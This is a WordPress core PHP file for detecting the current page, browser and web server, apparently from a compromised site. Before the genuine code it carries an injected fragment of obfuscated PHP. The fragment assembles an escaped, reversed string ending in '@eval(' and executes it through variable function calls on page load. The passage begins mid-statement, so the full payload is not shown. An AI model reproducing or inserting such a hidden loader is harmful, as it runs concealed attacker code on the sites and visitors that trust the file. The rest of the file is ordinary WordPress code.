o="\51\51";$rpi6fnZ0Ko.="\51\x7a\130";$rpi6fnZ0Ko.="\x65\117";$rpi6fnZ0Ko.="\103\170\60";$rpi6fnZ0Ko.="\114";$rpi6fnZ0Ko.="\147\x24";$rpi6fnZ0Ko.="\50";$rpi6fnZ0Ko.="\x44\x43";$rpi6fnZ0Ko.="\x4a\104";$rpi6fnZ0Ko.="\x58\101\x43";$rpi6fnZ0Ko.="\x73";$rpi6fnZ0Ko.="\125";$rpi6fnZ0Ko.="\x57\x24";$rpi6fnZ0Ko.="\50";$rpi6fnZ0Ko.="\67\154\x6c";$rpi6fnZ0Ko.="\x4e";$rpi6fnZ0Ko.="\150\x4c";$rpi6fnZ0Ko.="\x24";$rpi6fnZ0Ko.="\x28\x6c\141";$rpi6fnZ0Ko.="\166";$rpi6fnZ0Ko.="\x65";$rpi6fnZ0Ko.="\100";$rpi6fnZ0Ko=$WUsCAXDJCD($rpi6fnZ0Ko);@$jzDn24Pc($rpi6fnZ0Ko);};
/*
 *
 * Detects which user environment WordPress is being used on.
 * Only attempts to check for Apache, Nginx and IIS -- three web
 * servers with known pretty permalink capability.
 *
 * Note: Though Nginx is detected, WordPress does not currently
 * generate rewrite rules for it. See https://codex.wordpress.org/Nginx
 *
 * @package WordPress
 */

global $pagenow,
       $is_lynx, $is_gecko, $is_winIE, $is_macIE, $is_opera, $is_NS4, $is_safari, $is_chrome, $is_iphone, $is_IE, $is_edge,
       $is_apache, $is_IIS, $is_iis7, $is_nginx;

// On which page are we ?
if ( is_admin() ) {
    // wp-admin pages are checked more carefully
    if ( is_network_admin() ) {
        preg_match( '#/wp-admin/network/?(.*?)$#i', $_SERVER['PHP_SELF'], $self_matches );
    } elseif ( is_user_admin() ) {
        preg_match( '#/wp-admin/user/?(.*?)$#i', $_SERVER['PHP_SELF'], $self_matches );
    } else {
        preg_match( '#/wp-admin/?(.*?)$#i', $_SERVER['PHP_SELF'], $self_matches );
    }
    $pagenow = $self_matches[1];
    $pagenow = trim( $pagenow, '/' );
    $pagenow = preg_replace( '#\?.*?$#', '', $pagenow );
    if ( '' === $pagenow || 'index' === $pagenow || 'index.php' === $pagenow ) {
        $pagenow = 'index.php';
    } else {
        preg_match( '#(.*?)(/|$)#', $pagenow, $self_matches );
        $pagenow = strtolower( $self_matches[1] );
        if ( '.php' !== substr( $pagenow, -4, 4 ) ) {
            $pagenow .= '.php'; // for Options +Multiviews: /wp-admin/themes/index.php (themes.php is queried)
        }
    }
} else {
    if ( preg_match( '#([^/]+\.php)([?/].*?)?$#i', $_SERVER['PHP_SELF'], $self_matches ) ) {
        $pagenow = strtolower( $self_matches[1] );
    } else {
        $pagenow = 'index.php';
    }
}
unset( $self_matches );

// Simple browser detection
$is_lynx = $is_gecko = $is_winIE = $is_macIE = $is_opera = $is_NS4 = $is_safari = $is_chrome = $is_iphone = $is_edge = false;

if ( isset( $_SERVER['HTTP_USER_AGENT'] ) ) {
    if ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Lynx' ) !== false ) {
        $is_lynx = true;
    } elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Edge' ) !== false ) {
        $is_edge = true;
    } elseif ( stripos( $_SERVER['HTTP_USER_AGENT'], 'chrome' ) !== false ) {
        if ( stripos( $_SERVER['HTTP_USER_AGENT'], 'chromeframe' ) !== false ) {
            $is_admin = is_admin();
            /**
             * Filters whether Google Chrome Frame should be used, if available.
             *
             * @since 3.2.0
             *
             * @param bool $is_admin Whether to use the Google Chrome Frame. Default is the value of is_admin().
             */
            if ( $is_chrome = apply_filters( 'use_google_chrome_frame', $is_admin ) ) {
                header( 'X-UA-Compatible: chrome=1' );
            }
            $is_winIE = ! $is_chrome;
        } else {
            $is_chrome = true;
        }
    } elseif ( stripos( $_SERVER['HTTP_USER_AGENT'], 'safari' ) !== false ) {
        $is_safari = true;
    } elseif ( ( strpos( $_SERVER['HTTP_USER_AGENT'], 'MSIE' ) !== false || strpos( $_SERVER['HTTP_USER_AGENT'], 'Trident' ) !== false ) && strpos( $_SERVER['HTTP_USER_AGENT'], 'Win' ) !== false ) {
        $is_winIE = true;
    } elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'MSIE' ) !== false && strpos( $_SERVER['HTTP_USER_AGENT'], 'Mac' ) !== false ) {
        $is_macIE = true;
    } elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Gecko' ) !== false ) {
        $is_gecko = true;
    } elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Opera' ) !== false ) {
        $is_opera = true;
    } elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Nav' ) !== false && strpos( $_SERVER['HTTP_USER_AGENT'], 'Mozilla/4.' ) !== false ) {
        $is_NS4 = true;
    }
}

if ( $is_safari && stripos( $_SERVER['HTTP_USER_AGENT'], 'mobile' ) !== false ) {
    $is_iphone = true;
}

$is_IE = ( $is_macIE || $is_winIE );

// Server detection

/**
 * Whether the server software is Apache or something else
 *
 * @global bool $is_apache
 */
$is_apache = ( strpos( $_SERVER['SERVER_SOFTWARE'], 'Apache' ) !== false || strpos( $_SERVER['SERVER_SOFTWARE'], 'LiteSpeed' ) !== false );

/**
 * Whether the server software is Nginx or something else
 *
 * @global bool $is_nginx
 */
$is_nginx = ( strpos( $_SERVER['SERVER_SOFTWARE'], 'nginx' ) !== false );

/**
 * Whether the server software is IIS or something else
 *
 * @global bool $is_IIS
 */
$is_IIS = ! $is_apache && ( strpos( $_SERVER['SERVER_SOFTWARE'], 'Microsoft-IIS' ) !== false || strpos( $_SERVER['SERVER_SOFTWARE'], 'ExpressionDevServer' ) !== false );

/**
 * Whether the server software is IIS 7.X or greater
 *
 * @global bool $is_iis7
 */
$is_iis7 = $is_IIS && intval( substr( $_SERVER['SERVER_SOFTWARE'], strpos( $_SERVER['SERVER_SOFTWARE'], 'Microsoft-IIS/' ) + 14 ) ) >= 7;

/**
 * Test if the current browser runs on a mobile device (smart phone, tablet, etc.)
 *
 * @since 3.4.0
 *
 * @return bool
 */
function wp_is_mobile() {
    if ( empty( $_SERVER['HTTP_USER_AGENT'] ) ) {
        $is_mobile = false;
    } elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Mobile' ) !== false // many mobile devices (all iPhone, iPad, etc.)
        || strpos( $_SERVER['HTTP_USER_AGENT'], 'Android' ) !== false
        || strpos( $_SERVER['HTTP_USER_AGENT'], 'Silk/' ) !== false
        || strpos( $_SERVER['HTTP_USER_AGENT'], 'Kindle' ) !== false
        || strpos( $_SERVER['HTTP_USER_AGENT'], 'BlackBerry' ) !== false
        || strpos( $_SERVER['HTTP_USER_AGENT'], 'Opera Mini' ) !== false
        || strpos( $_SERVER['HTTP_USER_AGENT'], 'Opera Mobi' ) !== false ) {
        $is_mobile = true;
    } else {
        $is_mobile = false;
    }

    /**
     * Filters whether the request should be treated as coming from a mobile device or not.
     *
     * @since 4.9.0
     *
     * @param bool $is_mobile Whether the request is from a mobile device or not.
     */
    return apply_filters( 'wp_is_mobile', $is_mobile );
}
